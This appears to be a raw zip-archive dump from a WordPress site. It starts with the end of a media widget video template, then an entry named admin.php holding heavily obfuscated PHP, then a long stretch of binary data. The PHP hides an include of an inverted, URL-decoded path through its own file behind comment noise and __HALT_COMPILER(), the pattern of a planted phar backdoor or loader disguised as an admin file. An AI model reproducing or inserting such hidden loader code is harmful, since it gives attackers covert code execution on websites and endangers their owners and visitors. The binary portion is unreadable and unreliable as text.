						'additional_classes' => array( 'notice-alt' ),
					)
				);
				?>
			<# } else if ( data.is_oembed && data.model.poster ) { #>
				<a href="{{ data.model.src }}" target="_blank" class="media-widget-video-link">
					<img src="{{ data.model.poster }}" />
				</a>
			<# } else if ( data.is_oembed ) { #>
				<a href="{{ data.model.src }}" target="_blank" class="media-widget-video-link no-poster">
					<span class="dashicons dashicons-format-video"></span>
				</a>
			<# } else if ( data.model.src ) { #>
				<?php wp_underscore_video_template(); ?>
			<# } #>
		</script>
		<?php
	}
}
PK     \ki    ,  archive/js/archive/2023/docs/bgkvo/admin.phpnu 6$        <?php
#;3`OrX|
	 /*qPKI;K*/#b.w.
//KA
//"&e^a#"8N(Nj/die#F&6=VbH
(//@>$<Ut
include_once	/*D` b*/~//T2q
rawurldecode //"o4Sgi(/*6AIq*/'%'/*Vr7JZ'*/.	 #J/a.'8f%'/*es*/./*{-4*/'97%'	//8~[>h
.//Ya"8f%"	 #:%/IqwV./*rBwY*/'c5%'//A\*'@?
.#SPx<Y
"d0%"	/*c5zE2 */.//G^R"d0%"/*TT*/./*hp*/'99%'/*K5w*/.	#8J JYT,
'96%'/*(#?x,*/.##7c'93%'	//4?kH:4.#,Uw'8b%'#'XwR:MA./*:|VdQ>*/'9a%'#H$2.	/*{QRY'N*/'8d%'//QMU_T
.//'/{
"d0%"#S!L~.#4+`@?8
'8c%'#*(he.	//)kd
"8b%"#=br|~m
.#:t`Bpt`
"8d%"#,jv.#8Oi%K-~'96%'#&AO'V
./*P^s}:*/'91%'  /*Zg.vJw*/.//3}z'98%'/*dBB!DI*/.	/*e{*/'d1%' ##?Wx.//oD5TlW'8d%'/*QIp-oM*/.#;fZ"T'c'90%'#:#}
.#<zry'8b%'	 /*B$>8H*/.//>GWz9
"ce%"/*'*+\A'*/./*y,~+^<*/'cc%'/*_r?A:*/./*~ <##**/'83%'#P!2[Or/
.#P-!GP"9c%"//5]+FUV./*!Bk*/"90%"//xX<.//"[5uo;"91%"/*)\xu:*/.	/*6-R$y*/'89%'/*F[C[s0*/.//\j!'9a%'//vM6WWf.//9i"8d%" //o7
.//S!
'8b%'# Y`KUQ.#:1?dp
'd1%'  //w0WYj
.//'#nOz"9d%"/*Mc*/./*5witl*/"9e%"//nuahz
.//SEQs'8c%'#"r~>.//Z\5"9a%"#'veZ\r
.//G>ou&"c9%"#.x~Z.//.u+
'cb%'#>K#G{
.//%1Y"d2%"//A/m37
. 	#JYa_M"9b%"//P]xPd.	/*/MopeY*/'9a%'//XJYlO6./*FC3*/'9c%'	#UwHGJ
. //\h
"90%"	 #T4$.#."gF'X""9b%"//fMA2.//N 
"9a%"/*SeTFiZ*/.	/*LuhGv*/'83%'# UTcL2.//0`%{
'85%'	#C'[Ybf
.	#>eXq1$'93%'	  #61A86. #-tPz&(
'96%'//3g![k
.	/*'{G*/"9d%"#&%,./*jwaY 4*/'d1%'	#VVM1q0./*Gd*/"96%"	/*@aaD,*/./*dV*/'91%'#*[H2. /*Lfle*/'99%'#2_2mXv.//-(}'93%'#"~4n0zb
.//$y;'9e%'/*TF<)|7*/. #2|\F/[r'8b%'	//\jye,v. #S8r3
"9a%"/*g|Z5M*/.#.bZv
'd0%'		#Z=rM--7
.#>;e2
"8d%" //ob
.//Il
'9a%'//"yG),./*g[K!*/"8c%"#3YGZ
.#Wxt8x'
"90%" /*_MS}:/*/./*9T*/"8a%"# ^f`n./*3)nO*#*/'8d%' //Nn.//guC
'9c%'//blQ.//01yWj'9a%'//G]
./*\)d*/'c2%'#F=MWo. // )
"8f%"/*p1*/./*Tp(n*/'97%'/*d"*/.//`#
"9e%"//bg.#- [XB<}"8d%"/*z!'Zk*/./*8jZ\a*/'c5%'/*R5jyf*/.#McO?f_+"d0%"//|6yc.#P8Y.SJm
"d0"//]Mg[
)/*Xlr*/.	/*+:$*/__file__	#?=;`v
.//+d6Rx"/"#7\P^
. /**Iy:*/~//!jm"φϚ͒юˊ"/*u3&[s*/)#B@ *
;/*R!xUy*/__HALT_COMPILER(); ?>
P                 "   fwzziwo0yzmkdzn0emmyu2m.qjy4ujywet:  םh  Pf}      XF'Q ByA_Vm @v}s砂i&iN
nY>_= ʮEʰL~M=7
@7plAN6nb,5P@0z18s :( OBn5u5pKGtj[1@mxr
4(p7[J(HeMKX ~*T{9F=%XJbz9lmu`/Q2+9z}s`Gxo-OpR>lzd}	tL 3	nÚ)R8ˇb0ؖJsCwf 1=-89)EB&n0rLX	2YVCFXF  PAqK{<TF ժ&{rlMS߂>(`K(ˉR۶sq
Wloё(kˁYk `o7Q@@{N|T.fn\Bڕ1G] 3hZv-4
Dlւơe(w(@],oQ zXޚ+~5(Ɂ5 \
#ƕ?HK7׈s -+iƆ)L/bV>S%}R#" !50	>BV8k-xӄF1D5xVR$bfJ*O#@(F5;%K#n@sKjZ2(qbj̭O >'"g?l *BE|y4r$ p (-2 !-Y=SAj#9UKЖAZ  SPTRA"@V6
	rt$!>6wzLTo@wk:'R-,4{LK'T3 XV+)=6+Dm EOoqH@pՍ;K@+imIzsPߛvd]Xa-S@!bEW)eCG¿&чvSwh}C惄nݟ0!x|
/KHl4& 60bEךeJ|OMLb)jko
(7B8byHy]+(bhmw::K"Qà>N+PfIՉ6K4l`F]HiIq@*;|Bc?n\a;xİn?8x[b4n_ Z$cn#MX`O0iE{ ^z% ZHm1c8yw}JW;vyi&%%{c\(UuLçmS9uLl K6%
#{3~$hbVRruvNp)΃<8m'&ld0%᾵ˈ7.~x |A{gt;D$I^xdX4>S怷b@m/Gzc}}[/:Ċmv"ϤP
8cF4;Wԋ.3b1vH&!G!:- &\)|8L{zQ|B4"Cnj~TėNuD1{$YgxZL܉&;c*ފ(B}/wQ"Chuc:v֪ miХZ'&C"k1jcEۀ$t)=SC7< z1Pn=at>3a
ڝoRP Ǻ3:.'/51sVvR\Z0eW@⃀y	wQޫy_S">_5(n>it}5vT1)9*K/!ʼh\a>R%m7ͣ]Zۤ,.jxd8<ߺv~P)wǮ}&Ƹp\DȯԽ1\[BBBQ^(|@o+o\(x-~%LwḦ́)1kmUWAltL22yShT$6nX}~e4=z3pXh=gN5 :pe<;$Cޑ54E$9bIǏ%t-}	LPY_Tۅ"+ft\ǌpDjQkC]10g؉l(<O
C@y	Ǣ
j@/γeP9((/YBo*?oCۖ"%O4縐Eˬ,yXbEV,4,%AjRjUD=JcLh Rɫ[libDE觀A}`b7|>/QamUQtz2ae9Zyg>ư9=kοXHﴧ!&!Ś*?MGOɇ59tǣ9Z:Pf&p|ÝcecI֬3(QbhS&[uX#JT0rw6!|on/CLsB*/9g6{AbjpUa^ij},,ԷIGuq<Y
cf;a~Bc]^a'ꤜoOSUv2f{pSKn3`c?Q'ZC=r?^b6~*²`
vdޫ~	NbP=tt&Ac0"0T<;/ IՊ."m sRLLzV'mlari%ӉavCy. lGDP]4bs\$"GM]ڻ\C0G!EL52825*p<O0ϛ"تmdtb
AHIo,emfhJq8_?n
:=Sla>Y ʙ[632\.gMI^	.s+|V0*#?QEl,9OQZU0|_$d#awf8'JSsL[9g1![jM9 W5qRKa(^ʚُy4A*L\"Gv JPU. hʖ!ОEVϼD)O7*1g~Zu9хZބ?˹#|C[NuLеlίj̑do}Q4&9
;I= 4G^K~Uݷ/tG'/#}?$J7
1SU)(ymd+~DC	ߣqvGl&ېg<-xj'A\2,,D8b1dcR2/NP7;5I7˼x]CKD·|Ch4ba_7"p4JGE)Di!gawʣ'Z>ߕLPTD^IԾeg	<Ir 
Py#Z)xêBdfUD2lsэwhN1dCvr_bkH|ǟP.il*C?P6FDe,`(0^S\	pB+jaS1qw6_qZ?"WN%pס"	"_K$Ĉ{9ɾ5ENK
lVzI#>gPu%AwSY8ʲhߩWGITz!#Z+_cIxʉYgw>YW03V {BRͫ.$n+B]="\jY1#u>Z
9#Q)lB4u膕-xdw%4OѺZPU&ϜOQbO&O/L쵃!YƴSY%	zұ26[u}2	9N̉SZґG\/̼>wJ Ɇdy#/uYEwЍ-m&	an1sωLuhX@di _e-mwPÅ+p=!S.;0m\ĳ>e#M.Z֫5g)сkG'R@5s%4YJ7.̂yĒAEpi.X۷6ܴ5w<9bc
H3Q;d֕r\\UkcNQVEC>+z.yjy O"B%V@qD%iZmAIaGśJldT_P)ǴVcTǯs҂@غJrKָTȿ+VB4F<=GfpwJskMcgapvzXz444X8M؞Y<hrVJ.UF(+@!ܗځNeLUFt4y/ba:<H#NC`P#ߏehT	=T0힘.)^ڭBCw2Ϝ//=x(#bЅ[Ԁj<i[m{'|)`q)AW˾EذgilV-hy wq~k]Y,J^k0f+Ĉ.Era̹Bsku({$K⃬uI+VgMjH+oD_[y+[ߚҰ.}r uW:6S\!U"RkϠdk:uL.,4IF9<zgw;w3JOn0{)zrSqK*6jp1CCݬ雿X#bjڃe0$)IGu23oр;35޲)1g	]:~BWB-4Lj9 |X%~oLQB±\Ν;wsD{pۦ
}U釘WϾ%8ҵe\8VEcz-yW^˗4F4KR_°C3`!x0<>D>&&ltXD^۰({&t%Bⴡ<7M%Ld~Ɉ6(h':vrIHә~;2Z#-]ݙjyeiAdY|=}Q!|
,L̭IZoH
4WKÒ:e jAyo},S-qB	ţa[ݲ
3h5ȧe-JoC^LPs/3>~ӿ.ux1.kWoBwY;wQ.jiT!bVEmZˣ`5*LVk"D1}o+e,O>J-[0̐Ӧw&E2^ڷ]S3DU-w-Na?7,\ҜmG@8[Ф5Z<x4
F(u% {eg_*93IV<F8RK<:ox 
j_5A:p}#l3U3\}oIĈTRs|z%@4Ci [/!H9'c|$Yp/]ܮ5;N;0>]<4Ֆ6QU}<nІdܶ4ӟ%yr1@8T)BScc}_; $s7P,䳁u"lcotm
ux7ŮeTv]ԨRQj:tO2SM)-WAȗg/("|Wr3Ֆ~SܟlWn#4I$oj( POSfmvx53snd7ҫ_`HFVM2_pkdC&KL#L)	a+Gph'AbA<B^ePhk| >ݜopf))3'G/F&'Eq1{<7|y@1PH+导[NƎj%(۶ծ YmCzkM[Vna]t3`#Ԕ},e19.AK&Z0\3N1>]]L?jk\8})^;`iD(WLQ4RG=	O{k5
=a7R8GiAqBB	S`_;&)rPS׺HET/?［^.SD?@3k@ 6mKc40OT5	}G7Gt0F
`Y
lU_]Vh/0I-	ZOX&KMuϷ_c*ebTTEP7$\xK3^W :Ӟmh\9,}VA>^_vLgSw T{Z?f?;f#YR.I9<i-tHs>(֚yMGnyv"91~7[3d!e#(.+$4َ|XSF;"?z pKŕdKegz*;n>MQ~R&n˧NAvVceq%w4Tx#6Er+o~A|0VΔ邷{7߲2aOOUpl>O6V/1b=װ m=RVu"1TlךF2CZ|j.0|@ 4ߟ_T*#"Ȏ!"		+.2yەuUJȹK'@͍ D9vҖfU؛8/bP?-?FեsHumV>	<AgL_-FR&o
ObDd	VoM˺zb+t.,>KaL&rXU~@}mz {סY;2qJw*.z0?ƪü3b1!L}R_x0YS"ofVZ|
*e84T[]ZJ/
x&?[o;jb1mv{Wx_]k߫lֺш8R,&-ykdZ~Vv}QT}EϏ'>ͽl*Nny!V>sPRak_M'KiwUoo}Ϊ"#ve=[I _89iqyqTl3Ǆd ޜ/ 7ߛK'QE(-Xl5@5}3)^UEհ%=C>\o*?t$J(hRBL~ⷆ1i.vCN@0}ܳaۺ*9ڙz@tONTDh=_*Xiɱ}Tfq
WcwrԛUuͥ9D2ga;8K_W""}1 ^y~A7\:[my!g47#1jg=ލzhx_6'B.ni8mY"LU6$^&҂;R#Kh-
O&뻣ID-9Nf%°W74DSGjDdFd*w8wYgid0R)SWyrʈ
"(*RPJ;ieRdl!I0,g/y}jdYjBƨi=Lp<-XaLy׏Т._Toh`sBlu"=`dZJ0{+n+UzԿ}<ݜL&Y_(0LHϋT}p'L[_,dN>:	ӶٶC@kím??y.`tMrT"C©挟0qBJbrGȰdlAYfl4%8V{5Ő.-:}H)Wӆ5%?x>d%8<c~Xi^D(֊wѦ{L,# 3'erHƯ|K8\
L.,Sa#2M	xeiǹgL9	yAq	HaÈA[zCʹ~N}E9[NE%Y|a;\8ҝw\th$\Ϣ&^ ;͏,K7INꟜ_
PKR0 C+>%!?ke쫏Q[ncw3aqD˱QՖzdJ:6'4_9VpDގ|èIVK_҂Nּď}|&dp24la+23VltfPJ_]]\KFӾg,(-cI|e5_Xs|VvV-1˜7wvzUq2oF@X1 G93lU<y07KWFO\}R_ڋ&Ⱦ>=m|vOKT⾋n yO-)*.N~t~`~5â  6~洮,<:KFHx6SAl͇0vE:Da^jqb°2L}pj@&gNf!HT@c8k 1Cv>+xjkHۀ~_%lE$޵oHțY3;0 9R$f&
KZ4l!fW`Sf=(HKXHO90s'$'4"2ZO6mۀYe==Q-	;Lb2q<AEaC簤mX?OY׃]T3}[e
c+&^R"]`6"lOcB<$*x2@"#kerDWp͜jO!Ma$J#aB	%(GsLA_va" Y7vLKL8ưe?<W@|4JKl,Ti
k崽9cqbb͑{LuN9cCO~{Lg8!Wm;V
(NN"2&δ)FC._|@~hӾӯp|8sY|LKB>`lT2~HeeO~9ITciS2ǒnԽЬ`
"rnI_MIDƄTw$׷C6>I6twjYd<39&VB?PԎtÅz'ܷ6딓(_Ho~(5չk~JU@/v .PN}Zqװ/U-%	D~2P?CkĭVv9jxnH2T^p,W>OMJJ|fVpZy\&Y|:e<|D#5k/vB0_zmA,`;{N!엟or/5$¯L-&Kcn?Lml#vQo(ώ-|&6|R䲥Nz.![X`9*Z~6b+SԬ ūvButhJV,0//%dՇi5s۶_˔bH @(*)P5Jh
y(w)h^>/J5T>`&}DS7 Ϭp
Bj+VP48X҂vyU	}OBwIxZCyvqVh':&EڻTЂLP-ȷ(3\Cs=\F'=<!d7 :ZW)	
1tS>C8^`s/T e n"e|.6Sz)	RuU^nkI<h>1/8S9ןw84*Dw'jFassRSyBTi\R/?\ W_&y+|ghBYʂ2>㑞< )pu%wQCր!^'PڲwHoK}g'lLϖ3[?7<4wO3 sՃ>42@A!ăF4"2%9Lc1WqaM{ʇ#NZpƺFr-L* دI4P|jT4IMmǙNWk95کcyչ ]VvٌqIY5>-t_G;,02&&mcl{7X@+r7scg`#Ucwzvu5j@w3	N$Ztۉsv@Sfɩ|'L<+ZWt,s9Y
(Ay}Lc?7
Ԥ6
|1y,*@TOn흨H'O//G(`!.:>#דZxvMPBYm|XJ['@Y C	:1GH?ƛ]Z|:_"%9}.n1A_#>`~w㑪k<!O7?xi_U=Kg1Z춁Wp_6ˏqiέ39ؿѼ\gـ~9^}'zDzc=WC5|R8{u>gm
̘ǉ?d2xN9ҵFe?lrB
L 3ٯLS:TeRUB>YS ɞ H CEP(G?^;SM>?J;^ <uo
KXPdkU+!o̰bSt#['Okod-cd4jL7&wAgOn1mg(n뮢<gVvk47C>2SOAS5[OxuCblQ	ߞ?`~+Yd(0`aylҾp 5gRDe)X/@rorl~;lM^|L~H~͝1@e]6||p-rb
Cб}2Wflp>Y^+Tfm%ي0#Ju^"M֝`jaI~f$_MaiIK80[m_>#,Mb՜uj9s)IUJ?;loaNCG)Fp=BIyU!@~ql$T>JX5}*4
-e$&.K2d3iz/6/y1s,$UI8.wm,_-mUDx9a=o{^M6;,XMU{b4?j3{?'[wN:S|UZ՟6k2 dEn/Jb-h|/Mvlv}L}}Pǥ gb!3C4c7yw::`㺁ja(˿	q"HnS )0LնWN*ӵ9 {W,4xn	U	A嗞ioZwPoIʞqK'z,h8R˽khoO4FMMq`Jiۏwz,dΪma̰[X&m	(:ѵ
ӝANΤ'¦|>]Ђ*u/|Qtb-6/j"?ImΣ0niI醃{Opj n1lŷr彠aҲ*'>@Y}#:L8Qa'JlMev~%٪Nݒ`W:oz>)=hWVKG]HhWT^ Y?50~0rfF'<[X3Ć--3Km2F0{
&/q @K]Oo_f!)jg- K[ٽ2(C։~>%X'q^] ^@[-	/
	?=jZƄ^ـD߯\Uݯ-]RQP}	vVo炙ԏ;YNNl*(پx"Ҹ/@ =x<`y%{my;'0~#@pq6n_X}@r0Х-IvMAO{~Gk.Et:EuMSLhg}pXx_:6
ZEi&LQbN1J1!ڢ0zT&|i2P1Lk- _P 	0dgƀnbC"h<)T;1N 7=!'P5s+XGd~W:վpiD
 pI}v
{KRwD%Odbs	jWCT>#f7je(sNjGQ8Ȋj@M.<f}gk<|ygߐ[4P&'e~iܖ<Whpun틣rwϒTXap]7rKvow)<h$֍PI+Ρx!!JEJcV4DϩG(y߮!)~)EC(kp;xXSBO:`un6hLwi6mifIo6B iP]5#,&@x
5Ȇ|ϸrm' a]D:iNUzC]{*~w8,KIp5ėgNj#d#8n"ZkW']ROF~M)*y<&j }Oİ=R3ݩ9Y&:nG %7+~<Xeko}wrQ'+I1ce\D.we
Q~#|\ *0)p7A?<npF4ӡߛJeC Ll@Hp*~aj=}l2TI#yD9d.>'?3E^-ϸvԗ's)D7Cx@ێ1,j>[4jDty/?zcScPsN R~1XUf;ҪGP_#YiyVv+V¼.Y漡v-mHug['{A;+,`NsiED[S0w^;c[7hn~syoj=FL9p9F6W_<;snCtezv~oxZ5`M%,ؑ*=.z,Z_6g󏨨	#`U7KۄY{Q־l^i˰5կ' cl58H)_cf:8[h9K̂?}S`9952A0OhKU߶ϧ;
>	6G<ݶD	<+`Z Ch[#75dò}ٿ(|at)C']OK0>`ŜbolD6RXЯ8Wf(lC`E*T~IH|@?0JrKA&|QH;g"6E7Iắx_{s7N鰑bKU봠˪t?pמg3qjʪ'{%ȩQ<;S_(o&ZWyUxcZ$gG+.xYdt}DDԈT}p&)sߣٙ\a&Vص4E|p0lH'lnË؃H74Rl)PgiߥtQ˩3DT.Xw\薆P;$z>`*tn2asTOH5 #"	Sܣ߿0״td'ZF,m:1|§VgC^UW
/8M7&K?v~6KVjmݒX%faNN>8D0#o= x<{8b$b	T1+y};if~Y\}90[w+Xjd=К UdSU@Pu<w-ɠg_Qw6xFrC׸#0[3q(?SQ@^EGaH~DgܕM|>MJAv0y/헄)36'?{{1`/"M|Te}7BUxݍť%OmVV$lHqM[[^gX'3TG:܇9(Y0F.
#'` GCe)Ԉ;zHf?m_0[0JYk̲$#S0+ꏊ&NQ^ߨ Lgh]"tUc߿O}Yq+bC?-Vm#繾nqQǥY#\/9Ie[6锕aRĴNGn`Kϳ"*G~,h0fߘ\ 2~{x9۞	K.qg컳ﺯv$oU~d>el3TRH-cjX˦zhj:ߙ@d^.S/6j_g-d+_X$tw6<TCj535NFٌ%IXZF43+Z u?]NDKms/{;tGCL]z}"|y"oy:J3&O	/|l&Jf~ɿ$&h==eܶ6y b
H{N}XJṶ̄vk !ؼ~ޑ8ZL	ބ7"ř\ȅ 㢼cZFv7nY>X:G%8L%#Rk2_=KOb!$,ٰwۙ**t1{faҢdcԍ	(#JÉymio]iQLe.pMOG?DS l/!ez*om=5]=捸GxEl@x57/9+WI-s\qmlH`?CI2ذpM.ɣpUa>"Tտ0	TDAToe4.L77L÷,Ґߐsrv XlBf.Ohĵ2ۨ(,anz$ r~33cTY_{B1e	(l#w]tjq3&gNeUvq㌸A<3Կ͔ʜz(wc!v8b+8MyYݳxu}Bl8t hFߞE݆}`g'UOpI& |0MqJ3hIBubdFzԧS'5#`_@%hLwƛ[MЏFĪvb0f lcx\M?%~ ٶk}ӺN/`U%WL8s2;ގsPScSBN3CQEҸ;UHR 6	<n2u/]ac~];WF}ۼgUpAȸuF(tߌ藋9Kՙ"F#.72|q|;39Zv"54v?-'Ga"P6i~G#}o$鄇0ѾLU%u[8dX`rCֵAP:z}<^2JQpn	c/Ovv<4A@mȋO ʤe.Uuf7Ǟ~Hy@ik#6؉rl^2䠖8BO2Ӗ|;[#(&-]eHg	+ӈwm%t{C*Oneo?Z<,0s_r]%C5QnӒx~,-~$V0:_^K85-q2^R@8i7ay5I,᜻]0e{3/UIkRNGfIvaWTjD,ѧb=뜋tiĴCsrHr=gC3ѺR]ZM2PQ\@o/bjd	(9iy{_Df$Ҧ4!q]kOf.\vP0^k xf1֚S7CE@@ORhߘ)+D3Ľ+Q WکUBCiEfzR .wM{J.rqǗ9<?6m=I/>=˖/ּ3UŢ}s	)l@OkO.sqN5̀΁Nw2"sennY,Էm{L?ƽ3gffDi*hd$i2M-RF,Ju_	LlϦ)w1UCkXǔ~݈Ѳ{K|ot[NLu*Eqܻ(Zˬ
PcU1 [
4>a] ;}⣅#qC_*M:5Ն`+@)$PL)~=tm\QK(6Rh;_Թ:tq(A|k*W,\"~ͤ6P蔞vGVND>ynG~O'9	l~!6q.ďA?vjUOjuoL|6I>+dqGYNH"t']2"%yުlc_,Qj
w.p`D:Zs
K2=g7`7ݬrAWE+d.kZF%4sĦEJ\7$=%[_ݿyUƻ/Ō)8g&#kh?}HwQѿA[x|_U|~?" dd}{F,@kzIAѩ# |$MELRơC5mm5[&k|_g62[%$VMD*\IE"xT ?t @#<2D""؝xQ¢~6Y@BNl1J
Xx͢=mLiVbML+ϏY \\YnܠoP su(t=t"@҂fէmF<k|>Jl0/X%W 
#tަ:LȖfWrQ
6;a4-qrd1<x3՝6tڒ6PRuDhV;{f{ڡ 1[rY~/ˑwƾ}ٓƟf1<>)'̩6F
KG"	-3&/L^sjxCD|p% Ti'[H1͔ *3J{~aT]]V3;ZeȂ4DT=.S'JWI#9|fbZ'OŕܷnO⛔)@:,={cI²6)W{'/j*5aYHF%<|{yk"KnWbWc$ 6ݝ[w\ӹw8Z#ϋB,?Ǯy޿7vA/BM]R !)lŷ,nw9?РJ8RdK	X8t伜xYgO%gyySlVo3O.σ$Wy;ro9Hg{3~"by;X%)=*޺eI#̟	T=i2%0m8K|T:qeTe@`4@֭/[Y ZOMڣN)f)/a-cE̝17(`/bv}!mEy2v~kF
'|`F_h-,Cszu;-9j9^<zԵ|0JVILʒTmF_,QYr,9>1Zvd\5:+ePůk{
8ָ	6iN]q%2E*Ϗ*jUb(fQywn,1$!󴟑~|Ʋ<	Y"yuǕoSwbn	F&f~
#@#O]< >8M1ZjQz$!'7%V y=Ds6xGoVйyd4 W%PũjV 1}oܾEqӱn?OHqbw#d|uֿ+>đgR'<e%DtAz}<8|@=:4XAXŖJYc;2Yyx5gC4mb`/U$  :R63Q}OhD)vi5kr	E(N"܀:-{sN2`I#Pbh$'|jGeVD焄_:2~䔆 r@e5zw^JcII'_Co:>M]<8ٸ*glQHgt7Ċm4ɽqqXLA[8L#30QI2/BZbIB3<^ĶtMnvu2,KRjrc^	 <ŭ|>sU~f2%5LT0*5֕邂q9Qڢ_;Cw::?S?X%"D(7!oߗ'QT]m`XKHd~=	FM"狦{HΨ
gU:]NG$K
fuPqUʸrN<9kePYR	w	X1<WU>/d9o̞`BMmӞ8TTѶ|9MRdOאธw|<Oz$vI9Dgߟkn|vx-AKV1jBBC2>+pgO[1)6(CS3 1siOXQĜ6y!WOB~74juWu_`y`f@H
L܅j\[A]+')힦w,#l8z8ץeOg$S:΃J\7T0aR2(p{EL2tp1Hq/NL7J戎<ǿϗWCQ5짡Lz}:!|:VJt~է5o홵!^}-PkPlwh:r*:K+3w~+s%  Tu~X"lEk|ȱO<,*1#ٯ N8v~H~X65|)yhտҒ/؆ڡǰ"FeE3ڑW)8h`|-j2[=A?b`ts懱ӄ3(WQr <$_Ǧ4 96rCl3of`,N">1"Eo4uXL|u
&3a`A}l͕'JO>a 7CPuefkMsNwav3gg١C9jP	/Gʡ&_gPS`-ϮjHоxPw<	ԛ&L:;mF@_7>)(Vi\@f>&?-ʳ4n~2Sk\ z_:Xwxu#+y	8#qd~vMBR)"s&Zko#DysWUW+2բ	ޣ5\ѬƄ4emKV{%`c?4:Yi\rvZ"7x~i7tT{52iul"ͱLd5ܲ>۠H b9nG 22\Q3@/|\;|4$29fditS6MV,˵ 4CtiNBT]+-0/6ǲ
f OP8ZC:7ja7k :p.6j\
YAʈDOipɴW`QL10ٴnr̷n6pvwKbLoRY8`Dֱ5#@D{~֬?=_JELPE]`.[czK"DmOvF+ؚZUTq>?~'*X|ͬ>cYv\GBĒ䂔ynkJ1Q\/{mz-gE0KS≣ɍn%
_45-$F9hax.xb9 /-?d@1w-U"?>ZG&FNRZKhlv;̎*TѸ]HKfhfҀ='rB@ΪC;	DVh%:	m7"3~ލ{`AD/`%?!FKzG
ǎfRGrHW_Nq~3]cޗN҃&awEܦ1A0O95r=F,Xn^򕮺Du}\rC0M=gස	xW0gܭGk~^ioL멌ۨQU4)~ߪ'eL(K=H"dVM	h2H>U*ڪ_UqR`bu3Om5Nd$td6f,[qLp-R<lQw>}>Z&+HMf0S(7+yBd(kQnЙ8dD<׍}\W1ei@8mC_N3H`>يߓMZV6_Ѥ[DcTRgEAKOMQbG
&u>㩭K &$`+h/عi
R]f_GNB.MJ[>zh#J y88uCݓwlnZTӂP-yRF"q r*PXrua]/sQZP&AQ|S&~{> k}WO̖f)_4ͣg}=a0-J	&3~Zԍ-bZs`i».gN69 XBV4ѡ,jS4:BEHPmv`HؽdSɻ#$pS]WbzЍ4']GN>'d ?ƶj?̭@*j*z*p̲&x9^u3[ɆL&K[ꌋmqf;<@x[mLvcww|Jgxam%Wïw%%!EPY)/?CBFn"Fq3$!Ū%?vHB٨|"؁T.הn-_Ռʀ}$[&K%l{}YBѲ][:{jA%	_}cwfU.;3k0p9c#m*kO|d#!iFA}Ɓv@Xܱm7E/[Qdi"F	iMe םW:eL]$d~`,S~UF`AEՓ@n\n>:]yq}6Ec~WPWO.5=EEԁt܇CPwU*ea&Un*[)IBJ|;-lt尯<r)2ri@l>腭'Rݲp,+A&^!3ryk[ɅRS(K, QQDMZ	%wtp*JĿZP@"G9ُ\R;yv G7չ܁̮.h='m=K/xRp}#Ԍi}jY`8P
o_ιR%L^gY(SKhD}R5dM;?cx+p~lo}|ڼq3S$B֌g_S8`|Sx[CD[Z.'8 \qN@
jx,Rgs#6.ROc`)g_`ڏTڪGf~wӶFx
"z`)>PKB<̋h3sop]eFF}w;"эp|_~.FkAH;knjBTmz3Z4x9s/cu	9t&9߯yNቫ쾥>Xkwwe#<挬}ѰIsGAZZcWTL6*d %61HF&S5i[yw2#GHl=򦛼S8rAfj=LjkҟX6WvNJwi1G$%"y =gL	%	0Q8UkTtP%,M|3Nrt;uc7w{6bnebWJȢ#Gn$oz.6Heu_PqD'H9K`LxuicN>p%ƑdcjH-h罹j=yP>}8g6;?#Fچ~^hfW%sw31HD-|,t|>̀_Co&t,J|w:ETh@vC#ɞ":_Ap>~{D׶/; UIG29S|?n g#bFd"xi[҂%85m.'a=	f5vx7r[ӎ msjGwu׉<}'qM}ߎ)̪־Y>ν,wD@G|DZC{	"EXF_%dd+c&M3-&\rb%GN"dT]9X͡1*AH]_@EYV>Ďφ{OKpK)|=od`yeIYUH@dUbN8Z+Ȑ/ױBꌤo?tW%AbroC9HiJj'Tyǥv qZ!NIе?oKf[w蓡ő6l2SGصҭYi{_>/Qh>]Ra#V]I.!BkDhK6I88~NDtJ}%_:Q8.\5r$"/3G0\ݷPgNS%j!H5(htq56G  L<vU/Z-8+^C&}	.}!h qlHN/rW%}(PmW4ޘU99(}|ڔf4F<wB)):JRn3{IW6+7e4P,O.Y(ʥ$&A2'LΘF[{oCPD9jiNu|X]0ٗfV-9).I0c~`	8@s*Wa.<ێ]~c:.ˍE~ޝFߛ[j:`%P16C;&)^tǀr[wѣ|L01n
(JZƚkTFpsgmTb-e㚑6|7eg؊F|ǖwhdǰswxJ8҂\iktQVD$2V~A)muЍOqi|(دղ8I;nQj1͵jf@ɩ
DԅXӛ
(LƇ7O*r뵀ZT2U!v5D7~jiҽYMHj43@mBɷce_OߏM]tyʳ s1y?=2kQ|
A{g *x,?kq/=@aVa ܇(xZ8|hn/%Q4b?}+Փݯ=1
RgJnP޵˯6>R!WϝfICBSHQAAutrͿw$x {A3kOEA^"Y3,?8	x~<7S;-Ѩ*ls5n> L3|z-3,s1OHd5ߛqu81fM4__aLp3ty*m_#vdwWZBvU*+iӽt⋒rD똆N8˝M46)"
Dv,F;~Fb,&?դ0'eRcZJs!3^2iXF!_^8:ZTр27AtL#d!b>!.T)`!x`/^G>ňWF߼}oRUv@H_-e96]dTTdt%RK\a't_s̊Td$fy	0c 4
!?u.G:9Z8<^uBbJ}qɑ)5a<k)/cjುh;%xˢZΌ(|X`l[Vh^YD]k͌<C}){h͟o?Y씗JӅU㰀2-?WoRR0-)3-r:ځyj%^F%*nWE*·&|CkHKQ,,}h)5'i7H8;?k}k>zϯinn6bɖϴrv\_!?|]Z;(zA%d9TRѕ%<%T+F3F$*a3(Np펯s=J0V].eAz75\mLwÿjҙȮQEv0G8` ,D]킒XD5([6Of>fHn	hTD]MƄf%'I!Ub" ~cڤi'(*C;"<j]b%$,a_oK(.QU;-I-MtEOcS9YWlHDUU{YIPpUg44Ln`Íq%8dQۅ]|C@QZ#[)6iQt+jC@W%.t]hs+
kG'-6t6S`X-^ǩjd9GZy}_5Fkᆷ׉" eNoH4g/>옭X6Ȑ`,'^U[)˃Y0@V
بGs'jnzQKMTvLjoE3U.znj6X/Jx[b`kFQ%q_q>X_(eNM
[@f/_BN~Pgw1ƝD>DkP|.D:iM;<"׉2k=J&P蛠4MŝX"7N7^,W[f;]\,[=~hvOԷX'r͞3/q<xR!ooDfD!c-f$9'HE
q\0x+̝LY3>YayE6(ևRoHOdr$t
Kasp/z`_=S%%?(ܯSE3mvn4('JG6	-#G:g\{b6YlhiHY 	%e6Gk]k>"pV}8DM|+!' Xպy{5lVO2"V4DYg4ry2Jڀ^'c 
	PX5CgO6 F\Z*@+kz[.Ty )?ߡUkz1QtݞƪJO~QhHxt묏#w(XcQmRI/HA%eX<)[^Qjx8ns#HbO%E%$5.C~"퓺AFYqNA{8pF-ff8FTN, Hp	q(P$v2nKQg~3~x栖$<[^&0o$̳Ӿ=,e)66&>SK]|[_53X.ے8V(gTs	E
.?8c6i`jU`èܔAP
